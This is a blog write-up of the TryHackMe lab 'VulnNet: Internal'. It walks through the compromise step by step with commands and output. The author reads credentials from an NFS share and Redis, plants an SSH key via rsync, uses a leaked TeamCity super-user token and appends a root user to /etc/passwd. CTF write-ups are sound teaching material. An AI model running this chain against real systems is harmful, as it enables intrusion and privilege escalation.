THM: VulnNet: Internal

This is VulnNet: Internal from THM. It’s rated as Easy/Medium rated, and says:

VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.

I guess that means this is my pentest report?

Ports

So. Many. Ports. I could dump all of the nmap output here but that’s not my jam. Let’s summarise: we have SSH, RPCBind, rsync, Redis, NFS and some other nonsense we don’t care about. Where to begin?

NFS

Mounting the share of course. Broadly it looked like this:

┌──(root💀kali)-[/opt/thm/vninternal]
└─# showmount -e 10.10.247.87
Export list for 10.10.247.87:
/opt/conf *
                                                                                         ┌──(root💀kali)-[/opt/thm/vninternal]
└─# mkdir mountpt   
                                              
┌──(root💀kali)-[/opt/thm/vninternal]
└─# mount -t nfs 10.10.247.87: ./mountpt

There was a bunch of configuration stuff in there, including for Redis, which was one of our services:

┌──(root💀kali)-[/opt/…/mountpt/opt/conf/redis]
└─# cat redis.conf          

# etc
requirepass "B65Hx562F@ggAZ@F"
# more etc

Redis

With our password we can do this:

┌──(root💀kali)-[/opt/thm/vninternal]
└─# nc 10.10.247.87 6379
AUTH B65Hx562F@ggAZ@F
+OK
KEYS *
*5
$8
authlist
$10
marketlist
$13
internal flag
$3
int
$3
tmp
lrange authlist 0 10
*4
$112
QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==

Note that there was a flag there too, so get that if you want. authlist was a list, hence the lrange command. You can use redis-cli but you don’t need to. What is the base64?

┌──(root💀kali)-[/opt/thm/vninternal]
└─# echo 'QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==' | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

Creds for rsync.

rsync

rsync is running on Port 873 and we can’t use our creds for SSH. When running like this we need to know the ‘module’ name, so I use an nmap script:

┌──(root💀kali)-[/opt/thm/vninternal]
└─# nmap -p 873 --script rsync-list-modules 10.10.247.87                                  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 07:26 EDT
Nmap scan report for 10.10.247.87
Host is up (0.32s latency).

PORT    STATE SERVICE
873/tcp open  rsync
| rsync-list-modules: 
|_  files               Necessary home interaction

Nmap done: 1 IP address (1 host up) scanned in 2.99 seconds

Now we’ve got that, I do this:

┌──(root💀kali)-[/opt/thm/vninternal]
└─# rsync -a rsync://rsync-connect@10.10.247.87:/files what 

And that copies everything in the files module to the what directory on my machine. files (and by extension what) appears to be the /home directory from the server. We have a user called sys-internal. Sys-internal has an SSH directory but no keys. I send my public key up via rsync and then we can log in. Note that in the below, my SSH public key was in the foo.txt file.

┌──(root💀kali)-[/opt/thm/vninternal]
└─# rsync -avz foo.txt rsync://rsync-connect@10.10.247.87:/files/sys-internal/.ssh/authorized_keys                                                    
Password: 
sending incremental file list
foo.txt
rsync: chgrp "/sys-internal/.ssh/.authorized_keys.hcfpVf" (in files) failed: Operation not permitted (1)

sent 561 bytes  received 144 bytes  48.62 bytes/sec
total size is 569  speedup is 0.81
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1330) [sender=3.2.3]
                                                                                                                                                             
┌──(root💀kali)-[/opt/thm/vninternal]
└─# ssh sys-internal@10.10.247.87                                                       

Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sys-internal@vulnnet-internal

Privesc

This blog has no screenshots, and that’s quite deliberate because I want to be able to copy and paste stuff from here, which you obviously can’t do with a screenshot. So some of the privesc I’ll just have to describe.

Anyway, this did take me a little bit to figure out but here goes. Poking around logged in as sys-internal we can find /TeamCity and there is a whole bunch of stuff in there but nothing immediately stands out as useful. Linpeas won’t give us much, but it does show TeamCity running as root, e.g.

root       874 15.2 36.7 3438176 749952 ?      Sl   03:40   2:52      _ /usr/lib/jvm/default-java/bin/java -Djava.util.logging.config.file=/TeamCity/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -server -Xmx1024m -Dteamcity.configuration.path=../conf/teamcity-startup.properties -Dlog4j.configuration=file:/TeamCity/bin/../conf/teamcity-server-log4j.xml -Dteamcity_logs=/TeamCity/bin/../logs -Djava.awt.headless=true -Dignore.endorsed.dirs= -classpath /TeamCity/bin/bootstrap.jar:/TeamCity/bin/tomcat-juli.jar -Dcatalina.base=/TeamCity -Dcatalina.home=/TeamCity -Djava.io.tmpdir=/TeamCity/temp org.apache.catalina.startup.Bootstrap start

For some reason, linpeas won’t show us the open ports:

[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports                                                             
[+] Can I sniff with tcpdump?

Crickets. Humph. Now I did go down a different path for a while (Apache XML-RPC) but that wasn’t it; it is TeamCity. Where do we find it? Ask JetBrains:

After installation, the TeamCity web UI can be accessed via a web browser. The default addresses are http://localhost/ for Windows distribution and http://localhost:8111/ for the tar.gz distribution.

I set up a port forward:

ssh -L 9999:127.0.0.1:8111 sys-internal@10.10.4.9

Note the different THM IP is because I did this in two sessions. Once I’ve got the port forward I can access the TeamCity GUI at localhost:9999. There, we can login as the super user but in order to do so, we need a super user authentication token. It’s supposed to be in a particular file; let’s check:

sys-internal@vulnnet-internal:/TeamCity/logs$ cat teamcity-server.log
cat: teamcity-server.log: Permission denied

D’oh! Maybe there is another place….?

sys-internal@vulnnet-internal:/TeamCity/logs$ grep -r token
grep: teamcity-nodes.log: Permission denied
# etc, stuff
grep: host-manager.2021-05-07.log: Permission denied
catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 1540729311393804712 (use empty username with the token as the password to access the server)
catalina.out:[TeamCity] Super user authentication token: 1540729311393804712 (use empty username with the token as the password to access the server)
grep: catalina.2021-05-07.log: Permission denied
# etc, stuff

We have a selection to choose from. Only one works; try and find out which!

Once we log in - now what? I’ve never seen this thing before and what the hell does it do? According to Wikipedia, it’s a:

build management and continuous integration server

Yeah cool. Can I get root or not? According to the documentation:

Using the Command Line build runner, you can run any script supported by the OS.

Wonderful. So the next part was all GUI but it was basically create a project, add a Build Step which was a Custom Script, in my case it was adding a new user to /etc/passwd; the syntax was:

echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd

There a few bits you have to fill in and then a ‘run’ button will appear near the top of the page; click it and it completes; the project doesn’t need to do anything else. It’s not too hard to figure out.

Then in my shell:

sys-internal@vulnnet-internal:/TeamCity/logs$ su root2
Password: 
root@vulnnet-internal:/TeamCity/logs# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
vulnnet-internal
Fri May  7 04:32:56 CEST 2021
root@vulnnet-internal:/TeamCity/logs#

Yeah baby, that’s the stuff. Good box TheCyb3rW0lf